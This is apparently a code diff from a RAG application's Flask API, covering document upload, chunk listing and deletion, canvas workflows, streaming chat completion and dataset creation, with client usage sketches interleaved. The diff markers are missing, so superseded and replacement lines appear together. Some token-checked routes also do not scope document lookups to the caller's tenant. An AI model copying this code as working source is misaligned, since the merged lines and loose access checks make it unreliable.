            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)

    file = request.files['file']
    if file.filename == '':
        return get_json_result(
            data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)

    root_folder = FileService.get_root_folder(tenant_id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, tenant_id)
    kb_root_folder = FileService.get_kb_folder(tenant_id)
    kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

    try:
        if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
            return get_data_error_result(
                retmsg="Exceed the maximum file number of a free user!")

        filename = duplicate_name(
            DocumentService.query,
            name=file.filename,
            kb_id=kb_id)
        filetype = filename_type(filename)
        if not filetype:
            return get_data_error_result(
                retmsg="This type of file has not been supported yet!")

        location = filename
        while MINIO.obj_exist(kb_id, location):
            location += "_"
        blob = request.files['file'].read()
        MINIO.put(kb_id, location, blob)
        doc = {
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": kb.tenant_id,
            "type": filetype,
            "name": filename,
            "location": location,
            "size": len(blob),
            "thumbnail": thumbnail(filename, blob)
        }

        form_data = request.form
        if "parser_id" in form_data.keys():
            if request.form.get("parser_id").strip() in list(vars(ParserType).values())[1:-3]:
                doc["parser_id"] = request.form.get("parser_id").strip()
        if doc["type"] == FileType.VISUAL:
            doc["parser_id"] = ParserType.PICTURE.value
        if re.search(r"\.(ppt|pptx|pages)$", filename):
            doc["parser_id"] = ParserType.PRESENTATION.value

        doc_result = DocumentService.insert(doc)
        FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
    except Exception as e:
        return server_error_response(e)

    if "run" in form_data.keys():
        if request.form.get("run").strip() == "1":
            try:
                info = {"run": 1, "progress": 0}
                info["progress_msg"] = ""
                info["chunk_num"] = 0
                info["token_num"] = 0
                DocumentService.update_by_id(doc["id"], info)
                # if str(req["run"]) == TaskStatus.CANCEL.value:
                tenant_id = DocumentService.get_tenant_id(doc["id"])
                if not tenant_id:
                    return get_data_error_result(retmsg="Tenant not found!")

                # e, doc = DocumentService.get_by_id(doc["id"])
                TaskService.filter_delete([Task.doc_id == doc["id"]])
                e, doc = DocumentService.get_by_id(doc["id"])
                doc = doc.to_dict()
                doc["tenant_id"] = tenant_id
                bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
                queue_tasks(doc, bucket, name)
            except Exception as e:
                return server_error_response(e)

    return get_json_result(data=doc_result.to_json())

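A hedged sketch of uploading through this route. The form fields kb_name, parser_id, and run are the ones the handler reads above; the host and token are placeholders:

import requests  # hypothetical client for /document/upload above

BASE = "http://localhost:9380/api"                    # assumed server address
HEADERS = {"Authorization": "Bearer YOUR_API_TOKEN"}  # placeholder token

with open("manual.pdf", "rb") as f:
    resp = requests.post(f"{BASE}/document/upload",
                         headers=HEADERS,
                         data={"kb_name": "my_kb", "run": "1"},  # run="1" queues parsing right away
                         files={"file": f})                      # single part named 'file'
print(resp.json())
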
@manager.route('/list_chunks', methods=['POST'])
# @login_required
def list_chunks():
    token = request.headers.get('Authorization').split()[1]
    objs = APIToken.query(token=token)
    if not objs:
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    req = request.json

    try:
        if "doc_name" in req.keys():
            tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
            doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])

        elif "doc_id" in req.keys():
            tenant_id = DocumentService.get_tenant_id(req['doc_id'])
            doc_id = req['doc_id']
        else:
            return get_json_result(
                data=False, retmsg="Can't find doc_name or doc_id"
            )

        res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
        res = [
            {
                "content": res_item["content_with_weight"],
                "doc_name": res_item["docnm_kwd"],
                "img_id": res_item["img_id"]
            } for res_item in res
        ]

    except Exception as e:
        return server_error_response(e)

    return get_json_result(data=res)

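The handler accepts either doc_name or doc_id in the JSON body. A minimal sketch with placeholder host and token:

import requests  # hypothetical client for /list_chunks above

resp = requests.post(
    "http://localhost:9380/api/list_chunks",           # assumed server address
    headers={"Authorization": "Bearer YOUR_API_TOKEN"},
    json={"doc_name": "manual.pdf"},                   # or {"doc_id": "..."}; one of the two is required
)
for chunk in resp.json()["data"]:
    print(chunk["doc_name"], chunk["content"][:80])
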
@manager.route('/list_kb_docs', methods=['POST'])
# @login_required
def list_kb_docs():
    token = request.headers.get('Authorization').split()[1]
    objs = APIToken.query(token=token)
    if not objs:
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    req = request.json
    tenant_id = objs[0].tenant_id
    kb_name = req.get("kb_name", "").strip()

    try:
        e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")
        kb_id = kb.id

    except Exception as e:
        return server_error_response(e)

    page_number = int(req.get("page", 1))
    items_per_page = int(req.get("page_size", 15))
    orderby = req.get("orderby", "create_time")
    desc = req.get("desc", True)
    keywords = req.get("keywords", "")

    try:
        docs, tol = DocumentService.get_by_kb_id(
            kb_id, page_number, items_per_page, orderby, desc, keywords)
        docs = [{"doc_id": doc['id'], "doc_name": doc['name']} for doc in docs]

        return get_json_result(data={"total": tol, "docs": docs})

    except Exception as e:
        return server_error_response(e)


@manager.route('/document', methods=['DELETE'])
# @login_required
def document_rm():
    token = request.headers.get('Authorization').split()[1]
    objs = APIToken.query(token=token)
    if not objs:
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    tenant_id = objs[0].tenant_id
    req = request.json
    doc_ids = []
    try:
        doc_ids = [DocumentService.get_doc_id_by_doc_name(doc_name) for doc_name in req.get("doc_names", [])]
        for doc_id in req.get("doc_ids", []):
            if doc_id not in doc_ids:
                doc_ids.append(doc_id)

        if not doc_ids:
            return get_json_result(
                data=False, retmsg="Can't find doc_names or doc_ids"
            )

    except Exception as e:
        return server_error_response(e)

    root_folder = FileService.get_root_folder(tenant_id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, tenant_id)

    errors = ""
    for doc_id in doc_ids:
        try:
            e, doc = DocumentService.get_by_id(doc_id)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(doc_id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")

            b, n = File2DocumentService.get_minio_address(doc_id=doc_id)

            if not DocumentService.remove_document(doc, tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")

            f2d = File2DocumentService.get_by_document_id(doc_id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc_id)

            MINIO.rm(b, n)
        except Exception as e:
            errors += str(e)

    if errors:
        return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)

    return get_json_result(data=True)

||||
@manager.route('/completion_aibotk', methods=['POST'])
|
||||
@validate_request("Authorization", "conversation_id", "word")
|
||||
def completion_faq():
|
||||
import base64
|
||||
req = request.json
|
||||
|
||||
token = req["Authorization"]
|
||||
objs = APIToken.query(token=token)
|
||||
if not objs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
if "quote" not in req: req["quote"] = True
|
||||
|
||||
msg = []
|
||||
msg.append({"role": "user", "content": req["word"]})
|
||||
|
||||
try:
|
||||
conv.message.append(msg[-1])
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": ""})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
data_type_picture = {
|
||||
"type": 3,
|
||||
"url": "base64 content"
|
||||
}
|
||||
data = [
|
||||
{
|
||||
"type": 1,
|
||||
"content": ""
|
||||
}
|
||||
]
|
||||
ans = ""
|
||||
for a in chat(dia, msg, stream=False, **req):
|
||||
ans = a
|
||||
break
|
||||
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
|
||||
fillin_conv(ans)
|
||||
API4ConversationService.append_message(conv.id, conv.to_dict())
|
||||
|
||||
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
|
||||
for chunk_idx in chunk_idxs[:1]:
|
||||
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
|
||||
try:
|
||||
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
|
||||
response = MINIO.get(bkt, nm)
|
||||
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
|
||||
data.append(data_type_picture)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
response = {"code": 200, "msg": "success", "data": data}
|
||||
return response
|
||||
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
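
The handler above strips inline citation markers of the form ##N$$ from the answer and uses the digit to index reference["chunks"]. A small standalone illustration of that parsing; the sample answer string is made up:

import re

answer = "Shanghai is covered ##0$$ and so is Beijing ##2$$."   # made-up sample
# re.findall returns the whole matched string here; match[2] is the digit between "##" and "$$"
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', answer)]
clean = re.sub(r'##\d\$\$', '', answer)
print(chunk_idxs)  # [0, 2] — indices into ans["reference"]["chunks"]
print(clean)       # the answer text with the markers removed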
162  api/apps/canvas_app.py  Normal file
@@ -0,0 +1,162 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import json
from functools import partial

from flask import request, Response
from flask_login import login_required, current_user

from api.db.db_models import UserCanvas
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, server_error_response, validate_request
from graph.canvas import Canvas


@manager.route('/templates', methods=['GET'])
@login_required
def templates():
    return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])


@manager.route('/list', methods=['GET'])
@login_required
def canvas_list():
    return get_json_result(data=sorted([c.to_dict() for c in \
        UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
    )


@manager.route('/rm', methods=['POST'])
@validate_request("canvas_ids")
@login_required
def rm():
    for i in request.json["canvas_ids"]:
        UserCanvasService.delete_by_id(i)
    return get_json_result(data=True)


@manager.route('/set', methods=['POST'])
@validate_request("dsl", "title")
@login_required
def save():
    req = request.json
    req["user_id"] = current_user.id
    if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)

    req["dsl"] = json.loads(req["dsl"])
    if "id" not in req:
        if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
            return server_error_response(ValueError("Duplicated title."))
        req["id"] = get_uuid()
        if not UserCanvasService.save(**req):
            return server_error_response("Fail to save canvas.")
    else:
        UserCanvasService.update_by_id(req["id"], req)

    return get_json_result(data=req)


@manager.route('/get/<canvas_id>', methods=['GET'])
@login_required
def get(canvas_id):
    e, c = UserCanvasService.get_by_id(canvas_id)
    if not e:
        return server_error_response("canvas not found.")
    return get_json_result(data=c.to_dict())


@manager.route('/completion', methods=['POST'])
@validate_request("id")
@login_required
def run():
    req = request.json
    stream = req.get("stream", True)
    e, cvs = UserCanvasService.get_by_id(req["id"])
    if not e:
        return server_error_response("canvas not found.")

    if not isinstance(cvs.dsl, str):
        cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)

    final_ans = {"reference": [], "content": ""}
    try:
        canvas = Canvas(cvs.dsl, current_user.id)
        if "message" in req:
            canvas.messages.append({"role": "user", "content": req["message"]})
            canvas.add_user_input(req["message"])
        answer = canvas.run(stream=stream)
        print(canvas)
    except Exception as e:
        return server_error_response(e)

    assert answer, "Nothing. Is it over?"

    if stream:
        assert isinstance(answer, partial)

        def sse():
            nonlocal answer, cvs
            try:
                for ans in answer():
                    for k in ans.keys():
                        final_ans[k] = ans[k]
                    ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"

                canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
                if final_ans.get("reference"):
                    canvas.reference.append(final_ans["reference"])
                cvs.dsl = json.loads(str(canvas))
                UserCanvasService.update_by_id(req["id"], cvs.to_dict())
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        resp = Response(sse(), mimetype="text/event-stream")
        resp.headers.add_header("Cache-control", "no-cache")
        resp.headers.add_header("Connection", "keep-alive")
        resp.headers.add_header("X-Accel-Buffering", "no")
        resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
        return resp

    canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
    if final_ans.get("reference"):
        canvas.reference.append(final_ans["reference"])
    cvs.dsl = json.loads(str(canvas))
    UserCanvasService.update_by_id(req["id"], cvs.to_dict())
    return get_json_result(data=req["dsl"])

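A hedged sketch of driving the new canvas /completion route, non-streaming for brevity (stream defaults to true above). The mount point and ids are placeholders, and the call assumes an already-authenticated session because of @login_required:

import requests  # hypothetical client; login session assumed valid

session = requests.Session()  # assumed to carry a login session for the web app
resp = session.post(
    "http://localhost:9380/v1/canvas/completion",   # assumed mount point for canvas_app
    json={"id": "CANVAS_ID", "message": "hello", "stream": False},
)
print(resp.json())  # on this path the handler, as written, returns req["dsl"]
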
@manager.route('/reset', methods=['POST'])
@validate_request("id")
@login_required
def reset():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return server_error_response("canvas not found.")

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        req["dsl"] = json.loads(str(canvas))
        UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
        return get_json_result(data=req["dsl"])
    except Exception as e:
        return server_error_response(e)
@@ -20,8 +20,9 @@ from flask_login import login_required, current_user
from elasticsearch_dsl import Q

from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, huqie
from rag.utils import ELASTICSEARCH, rmSpace
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import TenantLLMService
@@ -37,7 +38,7 @@ import re
@manager.route('/list', methods=['POST'])
@login_required
@validate_request("doc_id")
def list():
def list_chunk():
    req = request.json
    doc_id = req["doc_id"]
    page = int(req.get("page", 1))
@@ -124,10 +125,10 @@ def set():
    d = {
        "id": req["chunk_id"],
        "content_with_weight": req["content_with_weight"]}
    d["content_ltks"] = huqie.qie(req["content_with_weight"])
    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
    d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req["important_kwd"]
    d["important_tks"] = huqie.qie(" ".join(req["important_kwd"]))
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
    if "available_int" in req:
        d["available_int"] = req["available_int"]
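
The hunk above renames huqie.qie/huqie.qieqie to rag_tokenizer.tokenize/rag_tokenizer.fine_grained_tokenize. A hedged before/after sketch of a call-site migration; the sample text is made up and the behavioral description is inferred from how the results are used:

# Before this change (old helper names):
#   d["content_ltks"] = huqie.qie(text)
#   d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
# After this change (same call sites, clearer names):
from rag.nlp import rag_tokenizer  # import path as used in the hunk above

text = "RAGFlow indexes documents into chunks."      # made-up sample
coarse = rag_tokenizer.tokenize(text)                # coarse-grained tokens
fine = rag_tokenizer.fine_grained_tokenize(coarse)   # finer sub-tokens for recall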
@@ -135,8 +136,11 @@ def set():
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
@@ -149,9 +153,9 @@ def set():
            if len(arr) != 2:
                return get_data_error_result(
                    retmsg="Q&A must be separated by TAB/ENTER key.")
            q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
            q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
            d = beAdoc(d, arr[0], arr[1], not any(
                [huqie.is_chinese(t) for t in q + a]))
                [rag_tokenizer.is_chinese(t) for t in q + a]))

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
@@ -201,11 +205,11 @@ def create():
    md5 = hashlib.md5()
    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
    chunck_id = md5.hexdigest()
    d = {"id": chunck_id, "content_ltks": huqie.qie(req["content_with_weight"]),
    d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
         "content_with_weight": req["content_with_weight"]}
    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req.get("important_kwd", [])
    d["important_tks"] = huqie.qie(" ".join(req.get("important_kwd", [])))
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()

@@ -221,13 +225,18 @@ def create():
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
        v = 0.1 * v[0] + 0.9 * v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))

        DocumentService.increment_chunk_num(
            doc.id, doc.kb_id, c, 1, 0)
        return get_json_result(data={"chunk_id": chunck_id})
    except Exception as e:
        return server_error_response(e)
@@ -253,8 +262,19 @@ def retrieval_test():

        embd_mdl = TenantLLMService.model_instance(
            kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
                                      vector_similarity_weight, top, doc_ids)

        rerank_mdl = None
        if req.get("rerank_id"):
            rerank_mdl = TenantLLMService.model_instance(
                kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])

        if req.get("keyword", False):
            chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
            question += keyword_extraction(chat_mdl, question)

        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
                                      similarity_threshold, vector_similarity_weight, top,
                                      doc_ids, rerank_mdl=rerank_mdl)
        for c in ranks["chunks"]:
            if "vector" in c:
                del c["vector"]

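With this hunk, retrieval_test optionally reranks when rerank_id is supplied and expands the query with LLM-extracted keywords when keyword is true. A hedged request sketch — the field names come from the code above, while the mount point, session, and model name are placeholders:

import requests  # hypothetical client for the retrieval_test route above

session = requests.Session()  # assumed authenticated session (@login_required)
body = {
    "kb_id": "KB_ID",
    "question": "How do I configure MinIO?",
    "similarity_threshold": 0.2,
    "vector_similarity_weight": 0.3,
    "rerank_id": "RERANK_MODEL_NAME",  # optional placeholder; triggers the rerank_mdl branch
    "keyword": True,                   # optional; appends extracted keywords to the question
}
print(session.post("http://localhost:9380/v1/chunk/retrieval_test", json=body).json())
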
@@ -13,12 +13,14 @@
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from flask import request
from copy import deepcopy
from flask import request, Response
from flask_login import login_required
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result
import json


@manager.route('/set', methods=['POST'])
@@ -103,9 +105,12 @@ def list_convsersation():

@manager.route('/completion', methods=['POST'])
@login_required
@validate_request("conversation_id", "messages")
#@validate_request("conversation_id", "messages")
def completion():
    req = request.json
    #req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
    #    {"role": "user", "content": "上海有吗?"}
    #]}
    msg = []
    for m in req["messages"]:
        if m["role"] == "system":
@@ -117,19 +122,54 @@ def completion():
        e, conv = ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        conv.message.append(msg[-1])
        conv.message.append(deepcopy(msg[-1]))
        e, dia = DialogService.get_by_id(conv.dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]
        ans = chat(dia, msg, **req)

        if not conv.reference:
            conv.reference = []
        conv.message.append({"role": "assistant", "content": ""})
        conv.reference.append({"chunks": [], "doc_aggs": []})

        def fillin_conv(ans):
            nonlocal conv
            if not conv.reference:
                conv.reference.append(ans["reference"])
                conv.message.append({"role": "assistant", "content": ans["answer"]})
            else: conv.reference[-1] = ans["reference"]
            conv.message[-1] = {"role": "assistant", "content": ans["answer"]}

        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    fillin_conv(ans)
                    yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
                ConversationService.update_by_id(conv.id, conv.to_dict())
        return get_json_result(data=ans)
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: "+str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp

        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = ans
                fillin_conv(ans)
                ConversationService.update_by_id(conv.id, conv.to_dict())
                break
            return get_json_result(data=answer)
    except Exception as e:
        return server_error_response(e)

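One subtle fix in this hunk: conv.message.append(msg[-1]) becomes conv.message.append(deepcopy(msg[-1])). Without the copy, the conversation stores a reference to the same dict that later code may mutate. A self-contained illustration of the aliasing hazard:

from copy import deepcopy

msg = [{"role": "user", "content": "hi"}]
conv_message = []

conv_message.append(msg[-1])            # aliases the same dict object
msg[-1]["content"] = "changed"
print(conv_message[0]["content"])       # "changed" — the stored message mutated too

conv_message = [deepcopy(msg[-1])]      # independent snapshot, as the fix does
msg[-1]["content"] = "changed again"
print(conv_message[0]["content"])       # still "changed"
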
615  api/apps/dataset_api.py  Normal file
@@ -0,0 +1,615 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
import os
import pathlib
import re
import warnings
from io import BytesIO

from flask import request, send_file
from flask_login import login_required, current_user
from httpx import HTTPError
from minio import S3Error

from api.contants import NAME_LENGTH_LIMIT
from api.db import FileType, ParserType, FileSource
from api.db import StatusEnum
from api.db.db_models import File
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import construct_json_result, construct_error_response
from api.utils.api_utils import construct_result, validate_request
from api.utils.file_utils import filename_type, thumbnail
from rag.utils.minio_conn import MINIO

MAXIMUM_OF_UPLOADING_FILES = 256

# ------------------------------ create a dataset ---------------------------------------

@manager.route("/", methods=["POST"])
@login_required  # use login
@validate_request("name")  # check name key
def create_dataset():
    # Check if Authorization header is present
    authorization_token = request.headers.get("Authorization")
    if not authorization_token:
        return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")

    # TODO: Login or API key
    # objs = APIToken.query(token=authorization_token)
    #
    # # Authorization error
    # if not objs:
    #     return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
    #
    # tenant_id = objs[0].tenant_id

    tenant_id = current_user.id
    request_body = request.json

    # In case that there's no name
    if "name" not in request_body:
        return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")

    dataset_name = request_body["name"]

    # empty dataset_name
    if not dataset_name:
        return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")

    # In case that there's space in the head or the tail
    dataset_name = dataset_name.strip()

    # In case that the length of the name exceeds the limit
    dataset_name_length = len(dataset_name)
    if dataset_name_length > NAME_LENGTH_LIMIT:
        return construct_json_result(
            code=RetCode.DATA_ERROR,
            message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")

    # In case that there are other fields in the data-binary
    if len(request_body.keys()) > 1:
        name_list = []
        for key_name in request_body.keys():
            if key_name != "name":
                name_list.append(key_name)
        return construct_json_result(code=RetCode.DATA_ERROR,
                                     message=f"fields: {name_list}, are not allowed in request body.")

    # If there is a duplicate name, it will modify it to make it unique
    request_body["name"] = duplicate_name(
        KnowledgebaseService.query,
        name=dataset_name,
        tenant_id=tenant_id,
        status=StatusEnum.VALID.value)
    try:
        request_body["id"] = get_uuid()
        request_body["tenant_id"] = tenant_id
        request_body["created_by"] = tenant_id
        exist, t = TenantService.get_by_id(tenant_id)
        if not exist:
            return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
        request_body["embd_id"] = t.embd_id
        if not KnowledgebaseService.save(**request_body):
            # failed to create new dataset
            return construct_result()
        return construct_json_result(code=RetCode.SUCCESS,
                                     data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
    except Exception as e:
        return construct_error_response(e)

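A hedged sketch of creating a dataset through this route. The body may contain only name — anything else is rejected above — and both a login session and an Authorization header are expected. Host, mount point, and token are placeholders:

import requests  # hypothetical client for the dataset-creation route above

session = requests.Session()  # assumed to carry a valid login session
resp = session.post(
    "http://localhost:9380/v1/dataset/",                 # assumed mount point for dataset_api
    headers={"Authorization": "Bearer YOUR_API_TOKEN"},  # header presence is checked first
    json={"name": "product_docs"},                       # exactly one field; extras are rejected
)
print(resp.json())  # data carries dataset_name and dataset_id on success
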
# -----------------------------list datasets-------------------------------------------------------

@manager.route("/", methods=["GET"])
@login_required
def list_datasets():
    offset = request.args.get("offset", 0)
    count = request.args.get("count", -1)
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
        datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
            [m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
        return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
    except Exception as e:
        return construct_error_response(e)
    except HTTPError as http_err:
        return construct_json_result(http_err)

# ---------------------------------delete a dataset ----------------------------

@manager.route("/<dataset_id>", methods=["DELETE"])
@login_required
def remove_dataset(dataset_id):
    try:
        datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)

        # according to the id, searching for the dataset
        if not datasets:
            return construct_json_result(message=f"The dataset cannot be found for your current account.",
                                         code=RetCode.OPERATING_ERROR)

        # Iterating the documents inside the dataset
        for doc in DocumentService.query(kb_id=dataset_id):
            if not DocumentService.remove_document(doc, datasets[0].tenant_id):
                # the process of deleting failed
